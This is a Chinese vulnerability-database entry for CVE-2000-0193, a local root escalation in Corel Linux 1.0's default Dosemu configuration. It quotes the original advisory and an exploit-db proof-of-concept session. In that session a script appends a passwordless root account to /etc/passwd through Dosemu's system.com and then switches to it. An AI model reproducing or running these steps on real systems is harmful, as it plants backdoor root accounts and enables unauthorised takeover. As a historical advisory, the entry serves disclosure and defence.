Corel Linux Dosemu访问控制及特权提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105733 漏洞类型 未知
发布时间 2000-03-02 更新时间 2005-05-02
CVE编号 CVE-2000-0193 CNNVD-ID CNNVD-200003-005
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19787
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-005
|漏洞详情
CorelLinux1.0版本的Dosemu的默认配置存在漏洞。本地用户利用此漏洞可以执行system.com程序并提升特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/1030/info

A vulnerability exists in the configuration of Dosemu, the DOS emulator, as shipped with Corel Linux 1.0. Dosemu documentation cautions that the system.com binary should not be made available to users, as it implements the system() libc call. Users can use this command to execute commands as root, and obtain elevated access to the system.

This "vulnerability" has been documented in the Dosemu documentation for a number of years.

Script started on Fri Feb 25 13:54:00 2000
nebula:~$ id
uid=1000(suid) gid=1000(suid) groups=1000(suid)
nebula:~$ cat > hack-corel
#!/bin/bash
echo "owned::0:0::/:/bin/bash" >> /etc/passwd
^D
nebula:~$ chmod a+rx hack-corel
nebula:~$ export PATH="$PATH:."
nebula:~$ dos
CPU speed set to 430/1 MHz
Running on CPU=586, FPU=1, rdtsc=1

[ snip bunch of dosemu crap ]

"Welcome to dosemu 0.98!
C:\> system hack-corel; 
sh: : command not found 
C:\> exitERROR: general protection at 0x3f0ff: 0
ERROR: SIGSEGV, protected insn...exiting!
nebula:~$ tail -1 /etc/passwd
owned::0:0::/:/bin/bash
nebula:~$ su owned
nebula:/home/suid# id
uid=0(root) gid=0(root) groups=0(root)
nebula:/home/suid# exit
exit
nebula:~$ exit
|参考资料

来源:BID
名称:1030
链接:http://www.securityfocus.com/bid/1030
来源:BUGTRAQ
名称:20000302CorelLinux1.0dosemudefaultconfiguration:Localrootvuln
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=200003020436.PAA20168@jawa.chilli.net.au